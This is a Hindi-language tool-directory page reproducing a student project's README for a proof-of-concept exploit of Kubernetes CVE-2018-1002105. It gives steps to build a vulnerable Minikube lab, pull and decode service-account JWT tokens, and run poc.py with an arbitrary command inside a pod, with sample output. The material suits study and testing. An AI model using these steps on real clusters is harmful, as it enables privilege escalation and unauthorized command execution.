Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-1002105 — CVE-2018-1002105 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉयट, एक Kubernetes विशेषाधिकार वृद्धि भेद्यता जो kube-apiserver के माध्यम से पॉड्स में अनधिकृत कमांड निष्पादन की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/sh-ubh/cve-2018-1002105
विशेषाधिकार वृद्धिकंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षा
GitHubsh-ubh/cve-2018-1002105

CVE-2018-1002105

CVE-2018-1002105 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉयट, एक Kubernetes विशेषाधिकार वृद्धि भेद्यता जो kube-apiserver के माध्यम से पॉड्स में अनधिकृत कमांड निष्पादन की अनुमति देती है।

रिपॉजिटरी देखें
124 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CMPT733-Group11(0x90)

CVE-2018-1002105

सदस्य: Abhishek Rungta, Shubham Saini, Siddhant Sood

पर्यावरण सेटअप

  • एक Linux VM (जैसे Ubuntu 20.04)
  • Kubernetes के स्थानीय परिनियोजन के लिए Minikube
  • इन पुराने संस्करणों में से कोई भी (1.0.x— 1.9.x, 1.10.0—1.10.10, 1.11.0—1.11.4, 1.12.0—1.12.2)

एक्सप्लॉइट चलाएँ

हमने एक virtual box इमेज (.ova फ़ाइल) प्रदान की है। इसे डाउनलोड करें और इससे एक VM बनाएँ। प्रदान की गई ova docker v18.09 और minikube v1.9.0 के साथ पूर्व-कॉन्फ़िगर की गई है।

OVA link

Kubernetes क्लस्टर बनाएँ

चूंकि हमारी virtual इमेज में पहले से ही minikube और आवश्यक kubernetes संस्करण हैं, बस minikube शुरू करने के लिए निम्न कमांड चलाएँ।

root@kitploit:~
minikube start --kubernetes-version=v1.12.2

नया उपयोगकर्ता, नेमस्पेस बनाएँ और भूमिका असाइन करें

निम्न कमांड का उपयोग करके एक नया उपयोगकर्ता और एक नेमस्पेस बनाएँ और बनाए गए उपयोगकर्ता को RBAC भूमिका असाइन करें।

root@kitploit:~
kubectl apply -f fixing_policy.yml

conntract तक पहुंच हटाएँ

root@kitploit:~
kubectl edit configmaps kube-proxy --namespace=kube-system

maxPerCore सेट को 0 में बदलें।

JWT टोकन प्राप्त करें

सिस्टम में संग्रहीत सभी jwt टोकन प्राप्त करने के लिए पहले निम्न कमांड चलाएँ।

root@kitploit:~
kubectl get secrets -A

बनाए गए विशेष उपयोगकर्ता का secret प्राप्त करने के लिए निम्न कमांड चलाएँ:

root@kitploit:~
kubectl -n [namespace] get secrets [user-token] -o json

फिर इसे base64 डिकोड करें।

root@kitploit:~
export TOKEN=$(echo TOKEN | base64 -d)
echo $TOKEN

IP पता और पोर्ट नंबर प्राप्त करें

root@kitploit:~
kubectl cluster-info

पॉड को परिनियोजित करने के लिए

root@kitploit:~
kubectl run --image=nginx:alpine securenginx -n poc

POC चलाएँ

सभी आवश्यक तर्क निर्दिष्ट करें:
-t लक्ष्य ip:port के लिए (आवश्यक)
-j उपयोगकर्ता के JWT टोकन के लिए (आवश्यक)
-p पॉड के लिए (आवश्यक)
-n नेमस्पेस के लिए
-m विधि के लिए (आवश्यक)
-c कंटेनर के लिए
-x हमलावर कमांड के लिए

परीक्षण मामला

इनपुट

root@kitploit:~
./poc.py -t [IP:Port] -j [token] -p [pod] -n [namespace] -m attach -x "command"
root@kitploit:~
./poc.py -t 127.0.0.1:32768 -j $TOKEN -p securenginx -m attach -n poc -x "ifconfig eth0" 

आउटपुट

root@kitploit:~
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02  
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1313 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1224 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:217603 (212.5 KiB)  TX bytes:428778 (418.7 KiB)

{"metadata":{},"status":"Success"}

वीडियो डेमो

डेमो वीडियो link

टूल डाउनलोड करें